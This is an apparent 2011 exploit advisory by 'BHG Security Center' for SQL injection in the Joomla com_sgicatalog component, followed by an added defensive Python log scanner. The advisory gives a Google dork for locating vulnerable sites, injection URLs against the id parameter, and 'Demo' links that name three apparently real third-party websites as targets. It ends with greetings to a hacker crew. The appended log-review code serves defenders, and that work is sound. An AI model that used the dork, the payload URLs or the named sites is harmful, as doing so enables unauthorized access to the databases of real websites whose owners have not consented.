####
# Exploit Title: Joomla Component (com_sgicatalog) <= SQL Injection Vulnerability
# Google Dork: inurl:index.php?option=com_sgicatalog
# Date: 2011-10-12
# Author: BHG Security Center
# Home: Http://black-hg.org
# Software Link: http://joomlaapps.com/
# Version: 1.x
# Tested on: [Windows XP- Persian]
# CVE : Webapps
####
[*] ExpLo!T :
http://127.0.0.1/index.php?option=com_sgicatalog&task=view&lang=en&id=-416'
http://127.0.0.1/index.php?option=com_sgicatalog&task=view&lang=en&id=[SQLi]
http://127.0.0.1/path/index.php?option=com_sgicatalog&task=view&lang=en&id=[SQLi]
[*] Demo : http://umbertodei.it/index.php?option=com_sgicatalog&task=view&lang=en&id=-416'
[*] Demo : http://www.holmac.com/index.php?option=com_sgicatalog&task=view&lang=en&id=-416'
[*] Demo : http://www.anisap.veneto.it/index.php?option=com_sgicatalog&task=view&lang=en&id=-416'
####
[+] Peace From #BHG
Vuln Component : com_sgicatalog
Error in file : Joomla component (com_sgicatalog), SQL injection
Vulnerable parameter : id (as in lang=en&id=)
####
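For defenders, an added example (not part of the original advisory) that reviews web access logs for com_sgicatalog requests whose id parameter is not a plain integer, as in the `-416'` probe shown above. It assumes combined-format logs and that legitimate catalog ids are non-negative integers; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: legitimate catalog ids are plain non-negative integers.
VALID_ID_RE = re.compile(r"\d{1,10}")


def suspicious_id(target):
    """Return the offending id value if target is a com_sgicatalog request
    whose id is not a plain integer, else None."""
    # parse_qs percent-decodes values, so %27 and ' are treated alike;
    # keep_blank_values keeps an empty id= visible instead of dropping it.
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if "com_sgicatalog" not in params.get("option", []):
        return None
    for value in params.get("id", []):  # every id= occurrence is checked
        if not VALID_ID_RE.fullmatch(value):
            return value
    return None


def scan(lines):
    """Return (client_ip, bad_id) for each log line that should be reviewed."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        bad = suspicious_id(m.group(1))
        if bad is not None:
            hits.append((line.split(" ", 1)[0], bad))
    return hits


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Oct/2011:10:00:01 +0000] "GET /index.php?option=com_sgicatalog&task=view&lang=en&id=416 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [12/Oct/2011:10:00:05 +0000] "GET /index.php?option=com_sgicatalog&task=view&lang=en&id=-416%27 HTTP/1.1" 500 312',
    '198.51.100.7 - - [12/Oct/2011:10:00:09 +0000] "GET /path/index.php?option=com_sgicatalog&task=view&lang=en&id=416&id=- HTTP/1.1" 200 5120',
    '203.0.113.4 - - [12/Oct/2011:10:00:12 +0000] "GET /index.php?option=com_content&id=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, bad in scan(SAMPLE_LOG):
        print(f"{ip} sent non-integer id {bad!r} to com_sgicatalog")
```

The same integer-only rule applied at the web server or WAF in front of the component blocks the request before it reaches the vulnerable query.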
=================================**BHG Security Center**=====================================|
# Greets To : |
|
Net.Edit0r ~ A.Cr0x ~ 3H34N ~ 4m!n ~ Cyrus ~ tHe.k!ll3r ~ Mr.XHat ~ ArYaIeIrAn ~ Mikili |
cmaxx ~ G3n3Rall ~ M4hd1 ~ Cru3l.b0y ~ HUrr!c4nE ~ r3v0lter , NoL1m1t , farbodmahini ~ xb0y |
s3cure.p0rt ~ THANKS TO ALL Iranian HackerZ |
============================================================================================ |